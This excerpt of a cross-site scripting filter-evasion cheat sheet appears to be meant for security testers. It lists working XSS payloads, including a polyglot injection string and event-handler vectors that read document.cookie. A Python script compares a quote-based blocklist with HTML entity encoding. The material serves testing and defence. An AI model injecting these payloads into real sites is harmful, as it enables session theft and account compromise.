This cheat sheet is for people who already understand the basics of Cross Site Scripting (XSS) attacks but want a deep understanding of the nuances regarding filter evasion.
Inject this string and, in most cases where a script is vulnerable with no special XSS vector requirements, the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to check a page quickly, injecting the deprecated <PLAINTEXT> tag is often enough to tell whether something is vulnerable to XSS, because it visibly breaks the output:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
The semicolons are required for this to work:
Skip the HREF attribute and get to the meat of the XSS... Submitted by David Cross ~ Verified on Chrome
<a onmouseover="alert(document.cookie)">xxs link</a>
Chrome also fills in missing quotes for you: if you get stuck, leave them off and Chrome will insert them in the right place in the URL or script.
<a onmouseover=alert(document.cookie)>xxs link</a>
Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:
Edited by Abdullah Hussam (@Abdulahhusam).
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
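The vectors above work because browsers tolerate missing quotes and odd attribute boundaries, which is exactly what quote-matching blocklist filters miss. The following Python example is added here and is not part of the OWASP cheat sheet: it runs the page's malformed-tag vectors through a constructed quote-based blocklist filter and through HTML entity encoding, then tokenizes each result with Python's html.parser (which accepts unquoted attribute values like a browser does) to see whether an event handler attribute survives. The filter and the vector list are constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser
import re

# Vectors quoted from the cheat sheet above (they only call alert()).
VECTORS = [
    '<a onmouseover="alert(document.cookie)">xxs link</a>',
    '<a onmouseover=alert(document.cookie)>xxs link</a>',
    '<IMG SRC=# onmouseover="alert(\'xxs\')">',
    '<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>',
]

# Constructed blocklist filter: strips <script> blocks and any on* attribute
# whose value is double-quoted. Filters of this shape are what the
# quote-less vectors on this page get past.
_SCRIPT_RE = re.compile(r"<script\b.*?</script>", re.I | re.S)
_QUOTED_HANDLER_RE = re.compile(r'\s+on\w+\s*=\s*"[^"]*"', re.I)

def blocklist_filter(value):
    return _QUOTED_HANDLER_RE.sub("", _SCRIPT_RE.sub("", value))

class HandlerFinder(HTMLParser):
    """Tokenizes markup the way a browser does (unquoted attribute values
    included) and records every on* attribute it encounters."""
    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name, value))

def surviving_handlers(markup):
    finder = HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers

def encode_for_html(value):
    # Contextual output encoding: <, >, &, " and ' become entities, so
    # attacker-controlled data can never open a tag or an attribute.
    return escape(value, quote=True)

def evaluate(vectors):
    """Returns the vectors that still carry a handler after each defence."""
    evaded_blocklist = [v for v in vectors if surviving_handlers(blocklist_filter(v))]
    evaded_encoding = [v for v in vectors if surviving_handlers(encode_for_html(v))]
    return evaded_blocklist, evaded_encoding
```

Only the quote-less `<a onmouseover=alert(document.cookie)>` vector gets past the blocklist, while none survive entity encoding; the polyglot is left out because its effect depends on the surrounding page context, which a standalone tokenizer cannot reproduce.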